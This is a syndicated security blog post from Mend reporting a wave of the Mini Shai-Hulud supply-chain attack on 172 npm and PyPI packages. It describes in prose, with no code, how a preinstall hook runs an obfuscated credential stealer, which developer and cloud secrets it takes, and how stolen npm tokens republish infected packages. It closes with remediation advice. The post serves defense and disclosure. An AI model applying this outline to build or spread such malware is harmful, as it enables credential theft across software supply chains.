Security Bloggers Network 
SBN

Mini Shai-Hulud Is Back: 172 npm and PyPI Packages Compromised in Latest Wave

by Tom Abai on May 12, 2026

The post Mini Shai-Hulud Is Back: 172 npm and PyPI Packages Compromised in Latest Wave appeared first on Mend.

The Mini Shai-Hulud supply chain campaign has resurfaced with its largest wave yet. Over a 48-hour window on May 11-12, 2026, attackers compromised 172 unique packages across 403 malicious versions on npm and PyPI, including high-profile scopes like @tanstack, @uipath, @mistralai, and @opensearch-project.

What happened

This is a continuation of the original Shai-Hulud campaign that first targeted SAP CAP packages in late April 2026. The attack pattern remains consistent: compromised packages execute a preinstall hook that downloads a Bun runtime and runs an obfuscated ~11.7 MB JavaScript credential stealer. Stolen secrets are exfiltrated through attacker-created GitHub repositories tagged with the signature phrase “A Mini Shai-Hulud has Appeared.”

What’s new in this wave

The scope has expanded dramatically. Instead of targeting a single ecosystem, this wave hit packages across multiple organizations simultaneously:

  • @uipath — 66 packages (agent SDKs, tooling, CLI)
  • @tanstack — 42 packages (router, start, devtools)
  • @squawk — 22 packages (aviation data tools)
  • @tallyui — 10 packages (POS and commerce components)
  • @mistralai — 3 packages (AI SDK for npm and PyPI)
  • @opensearch-project, @draftlab, @mesadev, and others

The attack also compromised unscoped packages like cross-stitch, ts-dna, wot-api, and safe-action.

What it steals

The payload targets developer and CI/CD credentials including:

  • SSH keys and Git configurations
  • AWS, Azure, GCP, and Kubernetes credentials
  • npm and GitHub tokens
  • Environment variables from CI runners
  • AI tool configurations (Claude Code, Kiro)

Critically, stolen npm tokens are used to propagate the attack, the malware identifies packages the victim can publish, injects malicious dependencies, bumps versions, and publishes compromised releases automatically.

What to do

  1. Check your dependencies – Review whether any of the affected packages were installed between May 11-12 in your projects or CI pipelines.
  2. Rotate credentials – If you installed a compromised version, rotate all npm tokens, SSH keys, and cloud credentials immediately.
  3. Pin versions – Use lockfiles and pinned versions to prevent automatic resolution to malicious releases.
  4. Monitor for unauthorized publishes – Check your npm packages for version bumps you didn’t make.

Mend coverage

Mend has issued three MSC advisories covering all 172 affected packages:

  • MSC-2026-5354 — 80 packages
  • MSC-2026-5355 — 80 packages
  • MSC-2026-5356 — 12 packages

*** This is a Security Bloggers Network syndicated blog from Mend authored by Tom Abai. Read the original post at: https://www.mend.io/blog/mini-shai-hulud-is-back-172-npm-and-pypi-packages-compromised-in-latest-wave/

Tom Abai 0 Comments